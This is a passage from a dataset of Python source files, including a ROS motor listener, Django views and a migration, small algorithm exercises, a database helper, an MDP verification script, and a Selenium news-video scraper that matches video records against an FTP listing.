dynamixel.getLastTxRxResult(port_num, PROTOCOL_VERSION))\n\telif dynamixel.getLastRxPacketError(port_num, PROTOCOL_VERSION) != 0:\n\t dynamixel.printRxPacketError(PROTOCOL_VERSION, dynamixel.getLastRxPacketError(port_num, PROTOCOL_VERSION))\n\n\n\ndef dxl_init():\n\t\n\t# Initialize PortHandler Structs\n\t# Set the port path\n\t# Get methods and members of PortHandlerLinux or PortHandlerWindows\n\t\n\t# Open port\n\tif dynamixel.openPort(port_num):\n\t print(\"Succeeded to open the port!\")\n\telse:\n\t print(\"Failed to open 
the port!\")\n\t print(\"Press any key to terminate...\")\n\t getch()\n\t quit()\n\n\t# Set port baudrate\n\tif dynamixel.setBaudRate(port_num, BAUDRATE):\n\t print(\"Succeeded to change the baudrate!\")\n\telse:\n\t print(\"Failed to change the baudrate!\")\n\t print(\"Press any key to terminate...\")\n\t getch()\n\t quit()\n\n\t# Enable Dynamixel Torque\n\tfor i in xrange(1):\n\t\twhile 1:\n\t\t\tdynamixel.write1ByteTxRx(port_num, PROTOCOL_VERSION, i+1, ADDR_MX_TORQUE_ENABLE, TORQUE_ENABLE)\n\t\t\n\t\t\tif dynamixel.getLastTxRxResult(port_num, PROTOCOL_VERSION) != COMM_SUCCESS:\n\t\t\t dynamixel.printTxRxResult(PROTOCOL_VERSION, dynamixel.getLastTxRxResult(port_num, PROTOCOL_VERSION))\n\t\t\telif dynamixel.getLastRxPacketError(port_num, PROTOCOL_VERSION) != 0:\n\t\t\t dynamixel.printRxPacketError(PROTOCOL_VERSION, dynamixel.getLastRxPacketError(port_num, PROTOCOL_VERSION))\n\t\t\telse:\n\t\t\t print(\"Dynamixel %d has been successfully connected\" %(i+1))\n\t\t\t break\n\n\t\n\ndef listener():\n\n\trospy.init_node('listener3', anonymous=True)\n\trospy.Subscriber('tester2', Data, callback)\n\trospy.spin()\n\nif __name__ == '__main__':\n\tdxl_init()\n\ttorque_ctrl()\n\tlistener()\n","sub_path":"beginner_tutorials/scripts/listener4.py","file_name":"listener4.py","file_ext":"py","file_size_in_byte":4872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"334569323","text":"from django.shortcuts import render, redirect\nfrom django.views.generic import View\nfrom .models import Profile\nfrom addresses.models import Address\nfrom addresses.forms import AddressForm\n\n# Require Login\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\n\n# Messages toolkit\nfrom django.contrib import messages\n\n\n# User's main profile\nclass ProfileView(View):\n\t@method_decorator(login_required(login_url='accounts:login'))\n\tdef get(self, request):\n\t\ttemplate = 'accounts/profile.html'\n\n\t\t# User's profile picture url\n\t\tprofile = Profile.objects.get(user=request.user)\n\t\tphoto = profile.photo\n\n\t\t# User's Address(es)\n\t\taddresses = Address.objects.filter(user=request.user)\n\t\tform = \tAddressForm()\n\n\t\tcontext = {\n\t\t\t'photo': photo,\n\t\t\t'addresses': addresses,\n\t\t\t'form': form\n\t\t}\n\t\treturn render(request, template, context)\n\n\n# Edit User's Profile\nclass EditProfileView(View):\n\t@method_decorator(login_required(login_url='accounts:login'))\n\tdef get(self, request):\n\t\ttemplate = 'accounts/edit.html'\n\n\t\t# User's profile picture url\n\t\tprofile = Profile.objects.get(user=request.user)\n\t\tprofile_pic = profile.photo\n\n\t\t# User's Address(es)\n\t\taddresses = Address.objects.filter(user=request.user)\n\t\taddress_form = \tAddressForm()\n\n\t\tcontext = {\n\t\t\t'photo': profile_pic,\n\t\t\t'addresses': addresses,\n\t\t\t'address_form': address_form\n\t\t}\n\t\treturn render(request, template, context)\n\n\tdef post(self, request):\n\t\taddress_form = AddressForm(request.POST)\n\n\t\tif address_form.is_valid():\n\t\t\tnew_address = address_form.save(commit=False)\n\t\t\tnew_address.user = request.user\n\t\t\tnew_address.save()\n\t\t\tmessages.success(request, \"Direccion guardada con exito\")\n\t\telse:\n\t\t\tmessages.error(request, \"No se pudo guardar la direccion\")\n\n\t\treturn 
redirect('accounts:profile')\n\n","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"246158220","text":"\"\"\"\nInput: two strings\nOutput: True or False\nDescription: Checks whether the characters in the first string\nappear in order in the second string \n\"\"\"\n\ndef isSubsequence(sub,string):\n\n if len(sub) == 0 or len(string) == 0:\n return False\n\n pointer = 0\n\n for x in string:\n if sub[pointer] == x:\n if pointer == len(sub) - 1:\n return True\n else:\n pointer += 1\n\n return False\n\ndef isSubsequenceResursive(string1,string2):\n if len(string1) == 0:\n return True # since it would mean we found everything in string 1 in string 2\n \n if len(string2) == 0:\n return False\n \n if string1[0] ==string2[0]:\n return isSubsequenceResursive(string1[1:len(string1)],string2[1:len(string2)])\n \n return isSubsequenceResursive(string1,string2[1:len(string2)])\n\n\"\"\"\nWhen ever you do any slicing in python it needs to be using\nthe \":\" operator\n\"\"\"\n\nif __name__ == \"__main__\":\n print(\"isSubsequence\")\n print(isSubsequence('hello','hello world'))\n print(isSubsequence('sing','sting'))\n print(isSubsequence('abc','abracadabra'))\n print(isSubsequence('abc','acb')) \n\n print(\"isSubsequenceResursive\")\n print(isSubsequenceResursive('hello','hello world'))\n print(isSubsequenceResursive('sing','sting'))\n print(isSubsequenceResursive('abc','abracadabra'))\n print(isSubsequenceResursive('abc','acb'))\n\n\n","sub_path":"Old/ColtSteele/isSubsequence.py","file_name":"isSubsequence.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"549379789","text":"import pyodbc\n\nimport logging\nlog = logging.getLogger(__name__)\n\n\nclass DbModel:\n def __init__(self,request):\n\n # creating cursor\n\n self.con_string = 'DSN=%s;UID=%s;PWD=%s;DATABASE=%s;' % (request.registry.settings.get('databse_datasource'), request.registry.settings.get('databse_user'), request.registry.settings.get('databse_password'), request.registry.settings.get('databse_name'))\n\n self.cnxn = pyodbc.connect(self.con_string)\n self.cursor = self.cnxn.cursor()\n\n # Function for getting all program name and id (return dictionary , program id as key and program name as value)\n def fetchPrograms(self):\n\n self.cursor.execute(\"select * from ProgramDetails\")\n programs = {}\n rows = self.cursor.fetchall()\n\n if rows:\n for row in rows:\n programs[row.ProgramId] = row.ProgramName\n\n return programs\n\n # Function for getting all program details id, name ,organization Id, etc (return dictionary )\n def fetchProgramDetails(self):\n\n self.cursor.execute(\"select * from ProgramDetails\")\n programs = {}\n rows = self.cursor.fetchall()\n\n if rows:\n for row in rows:\n programs[row.ProgramId] = {'programName':row.ProgramName, 'organizationId':row.OrganizationId, 'identityProgram':row.IdentityProgram}\n\n return programs\n\n # Function for getting all Carrier Details name and id (return dictionary , Carrier Details id as key and CarrierDetails name as value)\n def fetchCarrierGroups(self):\n\n self.cursor.execute(\"select * from CarrierDetails\")\n carrierGroups = {}\n rows = self.cursor.fetchall()\n\n if rows:\n for row in rows:\n carrierGroups[row.CarrierGroupId] = row.CarrierName\n\n return 
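The isSubsequenceResursive function above (its name carries a typo) slices both strings on every call, copying O(n) characters per step. The same in-order containment check can ride a single iterator, a common Python idiom; note this version treats the empty string as a subsequence, unlike the snippet's explicit length guard:

```python
def is_subsequence(sub: str, s: str) -> bool:
    """True if sub's characters appear in s in order, not necessarily adjacent."""
    it = iter(s)
    return all(ch in it for ch in sub)  # each 'in' consumes `it` up to the match

assert is_subsequence('sing', 'sting')
assert not is_subsequence('abc', 'acb')
```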
carrierGroups\n\n","sub_path":"usercentral/models/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"479286103","text":"# -*- coding: utf-8 -*-\nimport os\nimport pickle\nimport re\n\nimport requests\nimport platform\nimport argparse\nimport logging\nfrom time import sleep\nimport traceback\n\nfrom ftplib import FTP\nfrom random import choice\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.remote.webelement import WebElement\nfrom selenium.common.exceptions import NoSuchElementException, ElementNotInteractableException\nfrom datetime import datetime, timedelta\nimport config_loader\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-u', '--user', required=False)\nparser.add_argument('-p', '--password', required=False)\nargv = parser.parse_args()\n\n## 模拟浏览器 User-Agent\ndesktop_agents = [\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14',\n 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0'\n]\n\n\n# videos_source( \"popnews\": [, , , ])\nvideos_source = {'popnews': []}\nvideos_source['popnews'].append(['https://hd.stheadline.com/news/realtime/hk/即時-港聞', '港聞', 8, True]) # Pop News 港闻\nvideos_source['popnews'].append(['https://hd.stheadline.com/life/ent/realtime/即時-娛樂', '娛樂', 3, False]) # Pop News 娱乐\nvideos_source['popnews'].append(['https://hd.stheadline.com/news/realtime/wo/即時-國際/', '國際', 6, True]) # Pop News 国际\nvideos_source['popnews'].append(['https://hd.stheadline.com/news/realtime/chi/即時-中國/', '兩岸', 6, True]) # Pop News 两岸\nvideos_source['popnews'].append(['https://hd.stheadline.com/life/food/', '生活', 3, True]) # Pop News 生活\nvideos_source['popnews'].append(['https://hd.stheadline.com/life/health/', '生活', 3, True]) # Pop News 生活\nvideos_source['popnews'].append(['https://hd.stheadline.com/news/realtime/spt/即時-體育/', '體育', 6, True]) # Pop News 体育\nvideos_source['popnews'].append(['https://hd.stheadline.com/news/realtime/pp/即時-地產/', '地產', 6, True]) # Pop News 地產\n\n\n# html 中文内容解码\ndef html_decoder(req):\n if not ('utf-8' in req.apparent_encoding.lower() or 'utf-8' in req.encoding.lower()):\n return req.content.decode('gbk')\n else:\n return req.text\n\n\ndef popnews_ftp_comparor(selen_webdriver, debug_mode=False):\n \"\"\"\n :param selen_webdriver: selenium webdrver\n :param debug_mode:\n :type debug_mode: boolean default False\n True: load video_records from pickle file\n 
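The docstring above describes a debug_mode that reloads scraped records from a pickle instead of re-running the scraper, and the body that follows implements it inline. That load-or-compute pattern generalizes into a small helper (names here are illustrative):

```python
import os
import pickle

def load_or_compute(cache_path, compute):
    """Return pickled results when cached, otherwise compute and cache them."""
    if os.path.exists(cache_path):
        with open(cache_path, 'rb') as f:
            return pickle.load(f)
    result = compute()
    with open(cache_path, 'wb') as f:
        pickle.dump(result, f)
    return result

# video_records = load_or_compute('test_records.pkl',
#                                 lambda: pop_news_handler(selen_webdriver))
```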
False: run pop_news_handler() to get video_records\n \"\"\"\n ftp_url = '203.80.0.177'\n user = argv.user\n passwd = argv.password\n today_date = (datetime.now() - timedelta(days=0)).strftime(\"%Y%m%d\") # 20180904\n\n if debug_mode:\n with open('test_records.pkl', 'rb') as f:\n video_records = pickle.load(f)\n f.close()\n else:\n video_records = pop_news_handler(selen_webdriver=selen_webdriver)\n # 保存 video_records 测试用途\n with open('test_records.pkl', 'wb') as f:\n pickle.dump(video_records, f)\n f.close()\n\n ftp = FTP(ftp_url)\n ftp.login(user, passwd)\n ftp_mp4_dir = 'headline/%s' % today_date\n print_log(\"遍历FTP服务器: {}\".format(ftp_mp4_dir))\n file_gen = ftp.mlsd(ftp_mp4_dir)\n ftp.dir(ftp_mp4_dir)\n csv_name = os.path.join(mp4_save_path, 'popnews%s.csv' % today_date)\n if os.path.exists(csv_name):\n print_log(\"{} 已存在,删除中\".format(csv_name))\n os.remove(csv_name)\n\n videos_dict = {}\n for fg in file_gen:\n mp4_name = fg[0]\n match_key = mp4_name_match(video_records, mp4_name, fg[1].get(\"size\", \"-1\"))\n if match_key is not None:\n video_title = video_records[match_key][0]\n video_cat = video_records[match_key][1]\n if os.path.exists(csv_name):\n with open(csv_name, 'r', encoding='utf-8') as f:\n f_content = f.read()\n f.close()\n if mp4_name in f_content:\n continue\n else:\n if os.path.exists(csv_name):\n with open(csv_name, 'r', encoding='utf-8') as f:\n f_content = f.read()\n f.close()\n if mp4_name in f_content:\n continue\n video_title = ''\n video_cat = ''\n\n print_log(\"找到视频:{0} 标题:{1} 分类:{2}\".format(mp4_name, video_title, video_cat))\n\n # 保存对应MP4文件名的视频到dict里面\n if not videos_dict.get(video_cat, None):\n videos_dict[video_cat] = {}\n videos_dict[video_cat][mp4_name] = {\"video_title\": video_title}\n\n with open(csv_name, 'w', encoding='utf-8') as f:\n print_log(\"{} 保存中\".format(csv_name))\n write_str = \"\"\n for cat, val in videos_dict.items():\n for video_mp4_name, video_val in val.items():\n write_str += '{0},{1},{2}\\n'.format(video_mp4_name,\n video_val['video_title'].replace(',', ' '),\n cat)\n f.write(write_str)\n f.close()\n print_log(\"{} 已保存\".format(csv_name))\n\n\ndef pop_news_handler(selen_webdriver):\n \"\"\"\n 捉取POPNEWS MP4链接\n :param selen_webdriver: selenium webdrver\n :return: list [视频链接, 视频标题, 视频分类]\n \"\"\"\n video_records = {}\n selen_webdriver.implicitly_wait(20)\n # driver.set_page_load_timeout(30)\n selen_webdriver.maximize_window()\n for source in videos_source['popnews']:\n # 类别页面出错handler 跳过\n try:\n print_log(\"打开 Popnews '{}' 分类网页\".format(source[1]))\n is_rolling_page = source[3]\n selen_webdriver.get(source[0])\n close_ad_window(selen_webdriver)\n if is_rolling_page:\n # 点击载入更多\n load_more_pages(selen_webdriver, source[2])\n news_list = selen_webdriver.find_elements(By.CSS_SELECTOR, \"[class*='instantnews-list']\")\n # 有视频的新闻\n has_video_list = []\n for video in news_list:\n if is_rolling_page:\n has_video = find_element(selen_webdriver, By.CLASS_NAME, \"has-video\", 0, video)\n selen_webdriver.implicitly_wait(10)\n if has_video:\n video_page_url = find_element(selen_webdriver, By.CLASS_NAME, \"has-video\", 0, video).get_attribute(\"href\")\n has_video_list.append(video_page_url)\n else:\n continue\n for has_video_list_url in has_video_list:\n selen_webdriver.get(has_video_list_url)\n selen_webdriver.implicitly_wait(5)\n title = find_element(selen_webdriver, By.CLASS_NAME, \"has-video-txt\").text\n video_link = find_element(selen_webdriver, By.XPATH, \"\"\"//*[@id=\"player2_html5_api\"]\"\"\").get_attribute(\"src\")\n 
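The CSV above is assembled by manual string concatenation, with commas stripped out of titles to keep the columns aligned. The standard csv module quotes such fields instead, so titles keep their commas; a sketch with the same row layout (mp4 name, title, category):

```python
import csv

def write_video_csv(csv_name, videos_dict):
    with open(csv_name, 'w', encoding='utf-8', newline='') as f:
        writer = csv.writer(f)  # quotes fields that contain commas automatically
        for cat, videos in videos_dict.items():
            for mp4_name, video_val in videos.items():
                writer.writerow([mp4_name, video_val['video_title'], cat])
```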
print_log(\"视频标题:{}, 分类:{}, 视频链接:{}\".format(title, source[1], video_link))\n video_records[os.path.basename(video_link)] = [title, source[1], get_url_content_length(video_link)] # 视频链接, 视频标题, 视频分类, 视频大小\n except Exception as err:\n print_log(err)\n continue\n selen_webdriver.close()\n return video_records\n\n\ndef random_headers():\n \"\"\"\n 随机 浏览器 User-Agent\n \"\"\"\n return {'User-Agent': choice(desktop_agents), 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'}\n\n\ndef print_log(log_content, log_level='info'):\n print(log_content)\n if log_level == 'error':\n LOGGER.error(log_content)\n elif log_level == 'debug':\n LOGGER.debug(log_content)\n elif log_level == 'warn':\n LOGGER.warn(log_content)\n else:\n LOGGER.info(log_content)\n\n\ndef mp4_name_match(video_records: dict, name: str, size: str) -> str:\n for key, val in video_records.items():\n if name == key or val[2] == size:\n return key\n return None\n\n\ndef get_url_content_length(url: str) -> int:\n res = requests.head(url, allow_redirects=True)\n return res.headers.get(\"content-length\", -1)\n\n\ndef remove_dul_mp4(in_str: str) -> str:\n if in_str.endswith(\"mp4.mp4\"):\n mat = re.search(r\".*(http[s]?://.*?.mp4)\", in_str)\n return mat.group(1)\n return in_str\n\n\ndef close_ad_window(selen_webdriver: webdriver.Chrome):\n \"\"\"\n 关闭广告弹窗\n :param selen_webdriver: selenium webdrver\n \"\"\"\n ad_close_btn = find_element(selen_webdriver, By.XPATH, \"\"\"//*[@id=\"ad_popup_closebar\"]\"\"\", 10)\n if not ad_close_btn:\n print_log(\"没有广告弹窗\")\n return\n try:\n selen_webdriver.implicitly_wait(3)\n ad_close_btn.click()\n except ElementNotInteractableException:\n print_log(\"广告弹窗已关闭\")\n return\n\n\ndef load_more_pages(selen_webdriver: webdriver.Chrome, num_page: int = 1):\n \"\"\"\n 滚动加载更多页面\n :param selen_webdriver: selenium webdriver\n :param num_page: 需要加载的页面数量不大于15\n \"\"\"\n try:\n for i in range(1, min(num_page, 15)):\n sleep(1)\n # scroll to bottom\n selen_webdriver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n selen_webdriver.find_element(By.CSS_SELECTOR, \"\"\"#but-more-news\"\"\").click()\n except NoSuchElementException as err:\n print_log(\"No more pages button fount\")\n return\n\n\ndef find_element(selen_webdriver: webdriver.Chrome, by: By, value: str, timeout: int = 5, element: WebElement = None) -> WebElement:\n try:\n selen_webdriver.implicitly_wait(timeout)\n if element:\n return element.find_element(by, value)\n else:\n return selen_webdriver.find_element(by, value)\n except NoSuchElementException:\n print_log(\"No element {} found\".format(value), \"debug\")\n return None\n\n\ndef main():\n # 下载对应版本Edge 驱动 https://developer.microsoft.com/en-us/microsoft-edge/tools/webdriver/\n # 下载对应版本Chrome 驱动 https://chromedriver.chromium.org/\n # 放到此目录下\n headless = configs.conf_finder(section, 'headless', val_type=bool)\n if platform.system() == 'Windows':\n if driver_path.endswith(\"MicrosoftWebDriver.exe\") and os.path.exists(driver_path):\n print_log(\"加载Edge驱动\")\n driver = webdriver.Edge(executable_path=driver_path)\n print_log(\"驱动版本: {0}\".format(driver.capabilities['version']))\n elif os.path.exists(driver_path):\n print_log(\"加载Chrome驱动\")\n # options = webdriver.ChromeOptions()\n # options.add_argument('--headless')\n # options.add_argument('--start-maximized')\n # options.binary_location = r'C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe'\n driver = webdriver.Chrome(executable_path=driver_path)\n print_log(\"驱动版本: {0}\".format(\n 
driver.capabilities.get('chrome', dict()).get('chromedriverVersion', \"UNKNOWN\"))\n )\n else:\n print_log('缺少 web driver', log_level='error')\n exit(1)\n elif platform.system() == 'Linux':\n if os.path.exists(driver_path):\n print_log(\"\\u52a0\\u8f7dChrome\\u9a71\\u52a8\")\n options = webdriver.ChromeOptions()\n if headless:\n options.add_argument('headless')\n options.add_argument('window-size=1280x800')\n options.binary_location = '/opt/google/chrome/google-chrome'\n driver = webdriver.Chrome(executable_path=driver_path, chrome_options=options)\n print_log(\"驱动版本: {0}\".format(\n driver.capabilities.get('chrome', dict()).get('chromedriverVersion', \"UNKNOWN\"))\n )\n else:\n print_log('缺少 web driver', log_level='error')\n exit(1)\n elif platform.system() == 'Darwin':\n if os.path.exists(driver_path):\n print_log(\"\\u52a0\\u8f7dChrome\\u9a71\\u52a8\")\n options = webdriver.ChromeOptions()\n if headless:\n options.add_argument('headless')\n options.add_argument('window-size=1280x800')\n driver = webdriver.Chrome(executable_path=driver_path, chrome_options=options)\n print_log(\"驱动版本: {0}\".format(\n driver.capabilities.get('chrome', dict()).get('chromedriverVersion', \"UNKNOWN\"))\n )\n else:\n print_log('缺少 web driver', log_level='error')\n exit(1)\n else:\n print_log(\"OS Platform {} does not support\".format(platform.system()))\n exit(1)\n popnews_ftp_comparor(selen_webdriver=driver, debug_mode=debug_mode)\n driver.quit()\n print_log(\"Program Exit\")\n\n\nif __name__ == '__main__':\n LOGGER = logging.getLogger('popnews_csv')\n LOGGER.setLevel(logging.INFO)\n LOGFILE = 'popnews_csv.log'\n fileHandler = logging.FileHandler(LOGFILE, 'w', 'utf-8')\n LOGFORMAT = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s : %(message)s')\n fileHandler.setFormatter(LOGFORMAT)\n LOGGER.addHandler(fileHandler)\n configs = config_loader.ConfLoader()\n section = \"default\"\n mp4_save_path = configs.conf_finder(section, \"mp4_save_path\", r\"\")\n driver_path = configs.conf_finder(section, \"web_driver_path\")\n debug_mode = configs.conf_finder(section, \"debug\", default_val=False, val_type=bool)\n if not argv.user:\n argv.user = configs.conf_finder(section, \"ftp_user\")\n if not argv.password:\n argv.password = configs.conf_finder(section, \"ftp_pass\")\n main()\n","sub_path":"popnews_csv.py","file_name":"popnews_csv.py","file_ext":"py","file_size_in_byte":14881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"241966941","text":"import random\nimport inspect\n\nclass Time(object):\n def __init__(self, name, slots):\n self.slots = slots\n self.name = name\n\n def slots_reduce(self):\n self.slots -= 1\n return self.slots\n\ndef reducer(times, pick):\n #for i in range(0, len(times)):\n if pick == 'fri' and fri.slots <= 0:\n times.remove(fri.name)\n pick = random.choice(times)\n elif pick == 'fri' and fri.slots > 0:\n fri.slots_reduce()\n if pick == 'sat1' and sat1.slots <= 0:\n times.remove(sat1.name)\n pick = random.choice(times)\n elif pick == 'sat1' and sat1.slots > 0:\n sat1.slots_reduce()\n if pick == 'sat2' and sat2.slots <= 0:\n times.remove(sat2.name)\n pick = random.choice(times)\n elif pick == 'sat2' and sat2.slots > 0:\n sat2.slots_reduce()\n if pick == 'sun1' and sun1.slots <= 0:\n times.remove(sun1.name)\n pick = random.choice(times)\n elif pick == 'sun1' and sun1.slots > 0:\n sun1.slots_reduce()\n if pick == 'sun2' and sun2.slots <= 0:\n times.remove(sun2.name)\n pick = random.choice(times)\n elif pick == 'sun2' and sun2.slots 
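The print_log helper earlier in this record dispatches on the level string with an if/elif chain and routes 'warn' to LOGGER.warn, which the logging module deprecates in favour of warning(). A table-driven sketch of the same dispatch:

```python
import logging

def log_at(logger: logging.Logger, level_name: str, message: str) -> None:
    """Route a message to the matching logger method; unknown levels -> info."""
    dispatch = {'error': logger.error, 'debug': logger.debug,
                'warn': logger.warning, 'info': logger.info}  # warning(), not warn()
    dispatch.get(level_name, logger.info)(message)
```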
> 0:\n sun2.slots_reduce()\n if pick == 'sun3' and sun3.slots <= 0:\n times.remove(sun3.name)\n pick = random.choice(times)\n elif pick == 'sun3' and sun3.slots > 0:\n sun3.slots_reduce()\n\nif __name__ == '__main__':\n fri = Time(\"fri\",2)\n sat2 = Time(\"sat2\",2)\n sun3 = Time(\"sun3\", 2)\n sat1 = Time(\"sat1\",3)\n sun1 = Time(\"sun1\",3)\n sun2 = Time(\"sun2\",3)\n times = [fri.name, sat1.name, sat2.name, sun1.name, sun2.name, sun3.name]\n #print(times)\n","sub_path":"schedule.py","file_name":"schedule.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"624485661","text":"import random,argparse,sys,subprocess,os\n\nfrom numpy import cdouble\nparser = argparse.ArgumentParser()\n\ndef run(states,policy,player):\n cmd_encoder = \"python\",\"encoder.py\",\"--policy\",policy,\"--states\",states\n print(\"\\n\",\"Generating the MDP encoding using encoder.py\")\n f = open('verify_attt_mdp','w')\n subprocess.call(cmd_encoder,stdout=f)\n f.close()\n\n cmd_planner = \"python\",\"planner.py\",\"--mdp\",\"verify_attt_mdp\"\n print(\"\\n\",\"Generating the value policy file using planner.py using default algorithm\")\n f = open('verify_attt_planner','w')\n subprocess.call(cmd_planner,stdout=f)\n f.close()\n\n cmd_decoder = \"python\",\"decoder.py\",\"--value-policy\",\"verify_attt_planner\",\"--states\",states ,\"--player-id\",str(player)\n print(\"\\n\",\"Generating the decoded policy file using decoder.py\")\n cmd_output = subprocess.check_output(cmd_decoder,universal_newlines=True)\n\n os.remove('verify_attt_mdp')\n os.remove('verify_attt_planner')\n return cmd_output\n\ndef verifyOutput(states, output, player):\n output = output.split('\\n')\n if output[0] != player:\n print(\"\\n\",\"*\"*10,f\"Mistake: First line of policy file should be the player id, i.e.'{player}'\")\n sys.exit()\n output.remove('')\n with open(states,'r') as file:\n lines = file.readlines()\n states = [line.strip() for line in lines]\n if len(output)-1 != len(states):\n print(\"\\n\",\"*\"*10,f\"Mistake: Expected {len(states)} policy lines, got {len(output)-1}\")\n sys.exit()\n \n policy_states=[]\n for idx,out in enumerate(output[1:]):\n terms = out.split(' ')\n if len(terms) !=10:\n print(\"\\n\",\"*\"*10,f\"Mistake: In line {idx+2}, expected 10 terms , got {len(terms)}. {out}\")\n sys.exit()\n policy_states.append(terms[0])\n try:\n p = list(map(float,terms[1:]))\n except:\n print(\"\\n\",\"*\"*10,f\"Mistake: In line {idx+2}, Number format excpetion. 
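The reducer function above repeats the same draw-or-retire block once per time slot, and the `pick` it reassigns never reaches the caller. A table-driven sketch of the same idea: keep the Time objects in a dict, retire a slot when it empties, and return the slot that was actually booked (an illustrative rewrite, not the original):

```python
import random

def draw_slot(slots_by_name):
    """Pick a slot with remaining capacity, retiring exhausted ones."""
    candidates = list(slots_by_name)
    while candidates:
        pick = random.choice(candidates)
        if slots_by_name[pick].slots > 0:
            slots_by_name[pick].slots_reduce()
            return pick
        candidates.remove(pick)   # slot is full up; stop offering it
    return None                   # every slot exhausted

# times = {t.name: t for t in (fri, sat1, sat2, sun1, sun2, sun3)}
# booked = draw_slot(times)
```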
{out}\")\n sys.exit()\n \n states_intersection = set(states).intersection(set(policy_states))\n if len(states_intersection) != len(states):\n print(\"\\n\",\"*\"*10,f\"Mistake: States in policy file and input states file do not match\")\n sys.exit()\n \n print(\"OK\")\n\ndef getPlayerId(policy):\n with open(policy,'r') as file:\n line = file.readline()\n opponent_player = line.strip()\n if opponent_player=='1':\n player = '2'\n else:\n player = '1'\n return player\n\nif __name__ == '__main__':\n parser.add_argument(\"--states\",required=True,type=str,help=\"File with valid states of the player\")\n parser.add_argument(\"--policy\",required=True,type=str,help=\"Policy file of the opponent player\")\n args = parser.parse_args()\n player = getPlayerId(args.policy)\n output = run(args.states,args.policy,player)\n verifyOutput(args.states,output,player)\n\n\n","sub_path":"Assignment2/AtttVerifyOutput.py","file_name":"AtttVerifyOutput.py","file_ext":"py","file_size_in_byte":2863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"471019786","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport denorm.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('test_app', '0004_auto_20160306_1822'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='BaseConcreteModel',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='ExtendedConcreteModel',\n fields=[\n ('baseconcretemodel_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='test_app.BaseConcreteModel')),\n ('item_count', denorm.fields.CountField(b'relatedmodel_set', default=0)),\n ],\n options={\n },\n bases=('test_app.baseconcretemodel',),\n ),\n migrations.CreateModel(\n name='RelatedModel',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('thing', models.ForeignKey(to='test_app.ExtendedConcreteModel')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n","sub_path":"test_denorm_project/test_app/migrations/0005_baseconcretemodel_extendedconcretemodel_relatedmodel.py","file_name":"0005_baseconcretemodel_extendedconcretemodel_relatedmodel.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"215084965","text":"def groupAnagrams(strs):\n \"\"\"\n :type strs: List[str]\n :rtype: List[List[str]]\n \"\"\"\n def helper(s, t):\n ans = [0] * 26\n for i in s:\n ans[ord(i)- ord('a')] += 1\n for i in t:\n ans[ord(i)- ord('a')] -= 1\n for j in ans:\n if j != 0:\n return False\n return True\n ans = []\n for anag in strs:\n isAnagram = False\n for an in ans:\n if helper(an[0], anag):\n isAnagram = True\n an.append(anag)\n break\n if isAnagram == False:\n ans.append([anag])\n return ans","sub_path":"Qs/49_Group Anagrams.py","file_name":"49_Group Anagrams.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"625891661","text":"print(\"Welkom bij het spel: Wie is het! (maar dan met kaas)\")\nprint(\"Spelregels: Neem 